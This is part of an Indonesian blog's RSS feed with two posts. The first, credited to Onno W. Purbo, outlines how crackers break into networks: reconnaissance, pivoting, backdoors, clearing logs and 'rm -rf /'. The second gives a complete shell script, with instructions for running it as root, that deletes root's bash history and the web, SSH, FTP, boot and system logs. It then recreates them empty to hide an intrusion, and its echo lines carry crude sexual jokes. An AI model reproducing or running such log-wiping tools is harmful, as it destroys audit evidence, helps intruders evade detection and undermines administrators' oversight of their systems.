<p>Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di <a href="http://www.sans.org">http://www.sans.org</a>, <a href="http://www.rootshell.com">http://www.rootshell.com</a>, <a href="http://www.linuxfirewall.org/">http://www.linuxfirewall.org/</a>, <a href="http://www.cerias.purdue.edu/coast/firewalls/">http://www.cerias.purdue.edu/coast/firewalls/</a>, <a href="http://www.redhat.com/mirrors/LDP/HOWTO/VPN-Masquerade-HOWTO.html">http://www.redhat.com/mirrors/LDP/HOWTO/VPN-Masquerade-HOWTO.html</a>. Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di <a href="http://www.iss.net/vd/mail.html">http://www.iss.net/vd/mail.html</a>, <a href="http://www.v-one.com/documents/fw-faq.htm">http://www.v-one.com/documents/fw-faq.htm</a>. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di <a href="http://bastille-linux.sourceforge.net/">http://bastille-linux.sourceforge.net/</a>, <a href="http://www.redhat.com/support/docs/tips/firewall/firewallservice.html">http://www.redhat.com/support/docs/tips/firewall/firewallservice.html</a>.</p>
<p>Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di <a href="http://www.sans.org/newlook/publications/roadmap.htm">http://www.sans.org/newlook/publications/roadmap.htm</a>#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.</p>
<p>Pada dasarnya dunia hacker &#038; cracker tidak berbeda jauh dunia seni kebetulan disini kita berbicara tentang seni perang &#038; seni keamanan jaringan. Seperti dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By &#8216;System Crackers&#8217; When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang cacker umumnya pria usia 16-25 tahun. Melakukan cacking untuk meningkatkan kemampuan atau menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, umumnya cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.</p>
<p>Seperti kita tahu bahwa umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang memudahkan akses ke mail server dalam perusahaan. Dengan menggunakan agressive-SNMP scanner &#038; program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan.</p>
<p>Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin Windows serangan dapat dilakukan dengan melompat dari software wingate. Atau melompat dari mesin yang menggunakan proxy yang konfigurasinya kurang baik.</p>
<p>Setelah berhasil melompat dan memasuki sistem lain, cracker harus melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah  &#8216;ls <domain or network>&#8216; , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah &#8216;expn <user>&#8216;, dan (5) mem-finger user di mesin-mesin eksternal lainnya.</p>
<p>Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses &#038; eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.</p>
<p>Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti &#8216;ps&#8217; &#038; &#8216;netstat&#8217; di buat trojan (ingat cerita kuda troya?) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.</p>
<p>Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon di server yang lemah. Selanjutnya cracker dapat dengan mudah memperoleh akses sebagai ‘root’ (administrator tertinggi di server).</p>
<p>Untuk menghilangkan jejak, seorang cracker perlu melakukan operasi pembersihan &#8216;clean-up‘ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang &#8216;backdooring&#8217;. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh &#038; csh.</p>
<p>Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibaca, cracking mesin lain dengan melompat dari mesin yang di taklukan, memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat, bahkan bisa mematikan jaringan dengan cara menjalankan perintah ‘rm –rf / &#038;’.</p>
<p>Oleh karena itu semua mesin &#038; router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya &#038; di patch oleh software yang lebih baru.</p>
<p>from : Onno W. Purbo</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/belajar-menjadi-hacker.sonk/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Remove Log File on Linux and Unix Family</title>
		<link>http://www.kukukakikukakukaku.com/remove-log-file-on-linux-and-unix-family.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/remove-log-file-on-linux-and-unix-family.sonk#comments</comments>
		<pubDate>Mon, 19 Oct 2009 08:38:57 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Irc]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[auth]]></category>
		<category><![CDATA[logs]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=25</guid>
		<description><![CDATA[sebenernya simple saja untuk menghapus jejak² waktu mendaki guNung&#8230;dan yang jelas harus dapet hak super user/root&#8230;. 
langsung sajoo berikut scriptnya&#8230;:
#!/bin/sh
clear
echo "Luna beraksi beresin meja kerja"
echo " "
echo "Misi - misi gaN numpang lewaT"
echo "JangaN jaDi tuKaNg saPu mBoud..!!!"
echo "BiariN gaN jaNgaN siRik aH...apa biBir juRagaN saia saPu pake niH bibiR...!!!"
echo "saia bersiHkan si kaCrut dulu [...]]]></description>
			<content:encoded><![CDATA[<p>sebenernya simple saja untuk menghapus jejak² waktu mendaki guNung&#8230;dan yang jelas harus dapet hak super user/root&#8230;. <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/smoke.gif" alt=":smoke_tb:" /><br />
langsung sajoo berikut scriptnya&#8230;:<br />
<code>#!/bin/sh<br />
clear<br />
echo "Luna beraksi beresin meja kerja"<br />
echo " "<br />
echo "Misi - misi gaN numpang lewaT"<br />
echo "JangaN jaDi tuKaNg saPu mBoud..!!!"<br />
echo "BiariN gaN jaNgaN siRik aH...apa biBir juRagaN saia saPu pake niH bibiR...!!!"<br />
echo "saia bersiHkan si kaCrut dulu gaN.....!!!"<br />
rm -f ~root/.bash_history --> untuk del history perintah yang sudah pernah dilakukan<br />
rm -f /var/log/apache2/access.* --> untuk delete log apache/http yang sukses<br />
rm -f /var/log/apache2/error.* -->untuk delete log apache/http yang gagal/error<br />
rm -f /var/log/httpd/access.* --> untuk delete log apache/http yang sukses<br />
rm -f /var/log/httpd/error.* -->untuk delete log apache/http yang gagal/error<br />
rm -f /var/log/netconf.log --> untuk delete konfigurasi managemen network<br />
rm -f /var/log/boot.log --> untuk delete log booting system<br />
rm -f /var/log/messages --> untuk delete log semua kegiatan yang pernah dilakukan pada system<br />
rm -f /var/log/secure --> untuk delete log ssh<br />
rm -f /var/log/xferlog --> untuk delete log ftp<br />
rm -f /var/log/proftpd --> untuk delete log ftp<br />
echo "BersiH² sudaH beres gaN...!!!"<br />
echo "Beginilah nasib jadi pembantu.....HufT...Hikz..Hikz.."<br />
echo "BikiN SapiTeNk laGee gaN...!!!"<br />
touch ~root/.bash_history<br />
touch /var/log/apache2/access.log<br />
touch /var/log/apache2/error.log<br />
touch /var/log/httpd/access.log<br />
touch /var/log/httpd/error.log<br />
touch /var/log/netconf.log<br />
touch /var/log/boot.log<br />
touch /var/log/messages<br />
touch /var/log/secure<br />
touch /var/log/xferlog<br />
touch /var/log/proftpd<br />
echo "Selalu disuruh² eh... malah diperkosa lagi...HuaH....GeLi aH gaN...uH laGe dunt...!!"<br />
echo "saiaH kasi piL KB doLo gaN biaR bisa HaLim eh haMiL....emmmm..."<br />
echo " "<br />
chmod 0664 ~root/.bash_history<br />
chmod 0664 /var/log/apache2/access.log<br />
chmod 0664 /var/log/apache2/error.log<br />
chmod 0664 /var/log/httpd/access.log<br />
chmod 0664 /var/log/httpd/error.log<br />
chmod 0664 /var/log/netconf.log<br />
chmod 0664 /var/log/boot.log<br />
chmod 0664 /var/log/messages<br />
chmod 0664 /var/log/secure<br />
chmod 0664 /var/log/xferlog<br />
chmod 0664 /var/log/proftpd<br />
echo " "<br />
echo "Kerjaan siap gaN!! : ... "<br />
echo "gaN... gaN... Minta Seribu gaN... Belum Makan gaN... "<br />
echo " " </code></p>
<p>keterangan :<br />
<code>echo = menampilkan text<br />
rm = perintah untuk remove<br />
touch = untuk membuat file kosong<br />
chmod = merubah permision file </code></p>
<p>buat file dengan nama terserah, misal luna.sh dengan perintah<br />
<code>nano luna.sh<br />
atau<br />
vi luna.sh<br />
atau<br />
vim luna.sh<br />
atau<br />
pico luna.sh</code></p>
<p>kemudian isi file tersebut dengan script diatas dan save&#8230;<br />
setelah itu beri permision agar file sersebut bisa di esekusi, dengan perintah :<br />
<code>chmod +x luna.sh</code></p>
<p>setelah itu esekusi file dengan perintah :<br />
<code>./luna.sh</code></p>
<p>hanya sekedar info dan pembelajaran saja, tidak untuk disalah pergunakan&#8230;dan sekalipun disalah pergunakan saya tidak ikut bertanggung jawab&#8230;.!!! <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/devil.gif" alt=":devil_tb:" /></p>
<p>salam hangat&#8230;<br />
banksonk</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/remove-log-file-on-linux-and-unix-family.sonk/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

